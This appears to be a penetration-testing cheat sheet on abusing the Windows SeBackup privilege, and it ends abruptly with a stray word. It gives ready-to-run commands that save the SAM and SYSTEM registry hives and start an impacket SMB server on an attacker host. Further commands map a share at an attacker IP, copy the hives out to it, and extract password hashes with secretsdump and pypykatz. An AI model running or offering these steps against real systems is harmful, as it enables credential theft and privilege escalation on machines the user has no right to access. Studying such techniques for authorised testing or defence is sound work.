SeBackup

A Windows privilege that allows bypassing standard ACL checks to read files and registry hives during backup operations. Assigned by default to Administrators, Backup Operators, and Server Operators but disabled in user tokens by default. Backup-aware tools (e.g., reg.exe, robocopy, ntbackup) explicitly enable this privilege at runtime to access protected objects regardless of ACLs.

Exploitation

For AD exploitation check Backup Operators, Server Operators.

Dump

Move to a writeable directory and copy the hives:

# Move to a writeable directory
cd c:\windows\temp

# Copy the SAM and SYSTEM hives
reg save hklm\sam c:\windows\temp\sam
reg save hklm\system c:\windows\temp\system

Transfer the hives to the attacking host (preferrable via SMB and not WinRM):

# Start an SMB server
sudo impacket-smbserver share -smb2support / -user test -password test

Connect and copy the hives:

# Connect to the share
net use z: \\<attacker-IP>\share /user:test test

# Copy the hives
copy sam z:\
copy system z:\

Dump the creds on the attacking host:

# Dump creds with impacket
impacket-secretsdump -sam sam -system system LOCAL

# Dump creds with pypykatz
pypykatz registry --sam sam system

nxc